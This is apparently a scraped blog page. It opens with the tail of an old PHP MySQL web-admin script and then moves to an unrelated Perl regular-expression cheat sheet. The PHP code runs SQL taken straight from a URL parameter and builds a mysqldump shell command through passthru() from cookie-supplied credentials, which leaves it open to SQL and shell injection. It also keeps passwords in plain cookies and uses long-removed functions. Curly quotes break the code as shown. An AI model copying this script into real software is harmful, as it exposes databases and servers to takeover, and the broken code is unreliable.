$bindir = $rowArray[1].”bin/”;
}

passthru( $bindir.”mysqldump –user=$USERNAME –password=$PASSWORD
$dbname
$tablename” );
}

function utils() {
global $PHP_SELF, $command;
echo “<h1>Utilities</h1>\n”;
if( $command == “” || substr( $command, 0, 5 ) == “flush” ) {
echo “<hr>\n”;
echo “Show\n”;
echo “<ul>\n”;
echo “<li><a
href=’$PHP_SELF?action=utils&command=show_status’>Status</a>\n”;
echo “<li><a
href=’$PHP_SELF?action=utils&command=show_variables’>Variables</a>\n”;
echo “<li><a
href=’$PHP_SELF?action=utils&command=show_processlist’>Processlist</a>\n”;
echo “</ul>\n”;
echo “Flush\n”;
echo “<ul>\n”;
echo “<li><a
href=’$PHP_SELF?action=utils&command=flush_hosts’>Hosts</a>\n”;
if( $command == “flush_hosts” ) {
if( mysql_query( “Flush hosts” ) != false )
echo “<font size=2 color=red>- Success</font>”;
else
echo “<font size=2 color=red>- Fail</font>”;
}
echo “<li><a
href=’$PHP_SELF?action=utils&command=flush_logs’>Logs</a>\n”;
if( $command == “flush_logs” ) {
if( mysql_query( “Flush logs” ) != false )
echo “<font size=2 color=red>- Success</font>”;
else
echo “<font size=2 color=red>- Fail</font>”;
}
echo “<li><a
href=’$PHP_SELF?action=utils&command=flush_privileges’>Privileges</a>\n”;
if( $command == “flush_privileges” ) {
if( mysql_query( “Flush privileges” ) != false )
echo “<font size=2 color=red>- Success</font>”;
else
echo “<font size=2 color=red>- Fail</font>”;
}
echo “<li><a
href=’$PHP_SELF?action=utils&command=flush_tables’>Tables</a>\n”;
if( $command == “flush_tables” ) {
if( mysql_query( “Flush tables” ) != false )
echo “<font size=2 color=red>- Success</font>”;
else
echo “<font size=2 color=red>- Fail</font>”;
}
echo “<li><a
href=’$PHP_SELF?action=utils&command=flush_status’>Status</a>\n”;
if( $command == “flush_status” ) {
if( mysql_query( “Flush status” ) != false )
echo “<font size=2 color=red>- Success</font>”;
else
echo “<font size=2 color=red>- Fail</font>”;
}
echo “</ul>\n”;
} else {
$queryStr = ereg_replace( “_”, ” “, $command );
$pResult = mysql_query( $queryStr );
if( $pResult == false ) {
echo “Fail”;
return;
}
$col = mysql_num_fields( $pResult );

echo “<p class=location>$queryStr</p>\n”;
echo “<hr>\n”;

echo “<table cellspacing=1 cellpadding=2 border=0>\n”;
echo “<tr>\n”;
for( $i = 0; $i < $col; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
echo “<th>”.$field->name.”</th>\n”;
}
echo “</tr>\n”;

while( 1 ) {
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
echo “<tr>\n”;
for( $j = 0; $j < $col; $j++ )
echo “<td>”.htmlspecialchars( $rowArray[$j] ).”</td>\n”;
echo “</tr>\n”;
}
echo “</table>\n”;
}
}

function header_html() {
global $PHP_SELF;

?>
<html>
<head>
<title>MySQL Web Interface</title>
<style type=”text/css”>
<!–
p.location {
color: #11bb33;
font-size: small;
}
h1 {
color: #A4A260;
}
th {
background-color: #BDBE42;
color: #FFFFFF;
font-size: x-small;
}
td {
background-color: #DEDFA5;
font-size: x-small;
}
form {
margin-top: 0;
margin-bottom: 0;
}
a {
text-decoration:none;
color: #848200;
font-size:x-small;
}
a:link {
}
a:hover {
background-color:#EEEFD5;
color:#646200;
text-decoration:none
}
//–>
</style>
</head>
<body>
<?
}

function footer_html() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;

echo “<hr>\n”;
echo “<font size=2>\n”;
echo “<font color=blue>[$USERNAME]</font> – \n”;

echo “<a href=’$PHP_SELF?action=listDBs’>Database List</a> | \n”;
if( $tablename != “” )
echo “<a
href=’$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename’>Table
List</a> | “;
echo “<a href=’$PHP_SELF?action=utils’>Utils</a> |\n”;
echo “<a href=’$PHP_SELF?action=logout’>Logout</a>\n”;
echo “</font>\n”;
echo “</body>\n”;
echo “</html>\n”;
}

//—————————————————— MAIN

if( $action == “logon” || $action == “” || $action == “logout” )
logon();
else if( $action == “logon_submit” )
logon_submit();
else if( $action == “dumpTable” || $action == “dumpDB” ) {
while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
if( $var == “mysql_web_admin_username” ) $USERNAME = $value;
if( $var == “mysql_web_admin_password” ) $PASSWORD = $value;
}
$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
dump();
} else {
while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
if( $var == “mysql_web_admin_username” ) $USERNAME = $value;
if( $var == “mysql_web_admin_password” ) $PASSWORD = $value;
}
echo “<!–“;
$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
echo “–>”;

if( $mysqlHandle == false ) {
echo “<html>\n”;
echo “<head>\n”;
echo “<title>MySQL Web Interface</title>\n”;
echo “</head>\n”;
echo “<body>\n”;
echo “<table width=100% height=100%><tr><td><center>\n”;
echo “<h1>Wrong Password!</h1>\n”;
echo “<a href=’$PHP_SELF?action=logon’>Logon</a>\n”;
echo “</center></td></tr></table>\n”;
echo “</body>\n”;
echo “</html>\n”;
} else {
header_html();
if( $action == “listDBs” )
listDatabases();
else if( $action == “createDB” )
createDatabase();
else if( $action == “dropDB” )
dropDatabase();
else if( $action == “listTables” )
listTables();
else if( $action == “createTable” )
createTable();
else if( $action == “dropTable” )
dropTable();
else if( $action == “viewSchema” )
viewSchema();
else if( $action == “query” )
viewData( $queryStr );
else if( $action == “addField” )
manageField( “add” );
else if( $action == “addField_submit” )
manageField_submit( “add” );
else if( $action == “editField” )
manageField( “edit” );
else if( $action == “editField_submit” )
manageField_submit( “edit” );
else if( $action == “dropField” )
dropField();
else if( $action == “viewData” )
viewData( “” );
else if( $action == “addData” )
manageData( “add” );
else if( $action == “addData_submit” )
manageData_submit( “add” );
else if( $action == “editData” )
manageData( “edit” );
else if( $action == “editData_submit” )
manageData_submit( “edit” );
else if( $action == “deleteData” )
deleteData();
else if( $action == “utils” )
utils();

mysql_close( $mysqlHandle);
footer_html();
}
}

?>

Share Button

PERL Regular Expression REGEX Cheat Sheet Examples

Metacharacter Description
. Matches any single character (many applications exclude newlines, and exactly which characters are considered newlines is flavor-, character-encoding-, and platform-specific, but it is safe to assume that the line feed character is included). Within POSIX bracket expressions, the dot character matches a literal dot. For example, a.c matches “abc”, etc., but [a.c] matches only “a”, “.”, or “c”.
[ ] A bracket expression. Matches a single character that is contained within the brackets. For example, [abc] matches “a”, “b”, or “c”. [a-z] specifies a range which matches any lowercase letter from “a” to “z”. These forms can be mixed: [abcx-z] matches “a”, “b”, “c”, “x”, “y”, or “z”, as does [a-cx-z].

The – character is treated as a literal character if it is the last or the first (after the ^) character within the brackets: [abc-], [-abc]. Note that backslash escapes are not allowed. The ] character can be included in a bracket expression if it is the first (after the ^) character: []abc].

[^ ] Matches a single character that is not contained within the brackets. For example, [^abc] matches any character other than “a”, “b”, or “c”. [^a-z] matches any single character that is not a lowercase letter from “a” to “z”. Likewise, literal characters and ranges can be mixed.
^ Matches the starting position within the string. In line-based tools, it matches the starting position of any line.
$ Matches the ending position of the string or the position just before a string-ending newline. In line-based tools, it matches the ending position of any line.
BRE: \( \)
ERE: ( )
Defines a marked subexpression. The string matched within the parentheses can be recalled later (see the next entry, \n). A marked subexpression is also called a block or capturing group.
\n Matches what the nth marked subexpression matched, where n is a digit from 1 to 9. This construct is theoretically irregular and was not adopted in the POSIX ERE syntax. Some tools allow referencing more than nine capturing groups.
* Matches the preceding element zero or more times. For example, ab*c matches “ac”, “abc”, “abbbc”, etc. [xyz]* matches “”, “x”, “y”, “z”, “zx”, “zyx”, “xyzzy”, and so on.(ab)* matches “”, “ab”, “abab”, “ababab”, and so on.
BRE: \{m,n\}
ERE: {m,n}
Matches the preceding element at least m and not more than n times. For example, a{3,5} matches only “aaa”, “aaaa”, and “aaaaa”. This is not found in a few older instances of regular expressions.

Examples:

 

  • .atmatches any three-character string ending with “at”, including “hat”, “cat”, and “bat”.
  • [hc]atmatches “hat” and “cat”.
  • [^b]atmatches all strings matched by .at except “bat”.
  • [^hc]atmatches all strings matched by .at other than “hat” and “cat”.
  • ^[hc]atmatches “hat” and “cat”, but only at the beginning of the string or line.
  • [hc]at$matches “hat” and “cat”, but only at the end of the string or line.
  • \[.\]matches any single character surrounded by “[” and “]” since the brackets are escaped, for example: “[a]” and “[b]”.

 

for example, \( \) is now ( ) and \{ \} is now { }

 

A vertical bar separates alternatives. For example, gray|grey can match “gray” or “grey”.

 

gray|grey and gr(a|e)y are equivalent patterns which both describe the set of “gray” or “grey”.

 

?             The question mark indicates there is zero or one of the preceding element. For example, colou?r matches both “color” and “colour”.

*             The asterisk indicates there is zero or more of the preceding element. For example, ab*c matches “ac”, “abc”, “abbc”, “abbbc”, and so on.

+             The plus sign indicates there is one or more of the preceding element. For example, ab+c matches “abc”, “abbc”, “abbbc”, and so on, but not “ac”.

 

Share Button